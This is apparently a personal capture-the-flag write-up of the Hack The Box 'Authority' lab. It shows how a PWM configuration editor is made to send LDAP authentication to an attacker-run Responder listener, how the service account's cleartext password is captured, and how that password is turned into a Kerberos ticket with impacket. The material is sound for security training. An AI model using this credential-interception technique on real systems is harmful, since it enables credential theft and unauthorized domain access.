InfoSec LAB

Authority_PWM

Created: 2 min read

PWM

Using the cracked password, I am able to authenticate to the PWM instance running on the web server

Configuration Manager

While there’s a lot to go through in the Configuration Manager, it appears that PWM instance is not connected to the LDAPS server; authority.authority.htb:636 I am also able to download the current configuration for review as well as Downloading the DB

Configuration

┌──(kali㉿kali)-[~/…/htb/labs/authority/pwm]
└─$ file PwmConfiguration.xml 
pwmconfiguration.xml: XML 1.0 document, Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
 
┌──(kali㉿kali)-[~/…/htb/labs/authority/pwm]
└─$ ll PwmConfiguration.xml 
132k -rw-r--r-- 1 kali kali 132k jul 17 18:35 PwmConfiguration.xml

The downloaded configuration file is a large XML format

There is a hash string, but I was unable to crack it

LocalDB

The LocalDB button loads a page showing the loaded DB instance at c:\pwm\LocalDB I am also able to download that. I failed to review the DB file as it is a JAVA file requiring a JDBC driver

Configuration Editor

There is also Configuration Editor

Here, I am able to modify the configuration sets Notice there is an attribute, LDAP Proxy Password, with its value stored, but doesn’t show

Intercepting LDAP Authentication

But I might be able to change the LDAP URLs attribute

I will append an arbitrary LDAP server running on Kali

testing

The local Netcat listener picked up the LDAP authentication packet from the web app It contains the CLEARTEXT password for the svc_ldap account; lDaP_1n_th3_cle4r!

┌──(kali㉿kali)-[~/…/smb/Development/Automation/ansible_hash]
└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 
[...REDACTED...]
 
[+] Servers:
 
    LDAP server                [ON]
 
[...REDACTED...]
 
[+] Listening for events...
 
[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[+] Exiting...

It also works with responder

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-gettgt 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
[*] Saving ticket in svc_ldap.ccache

Credential validated TGT generated for better OPSEC with thepass_the_ticket attack technique

Interactive Graph View

Backlinks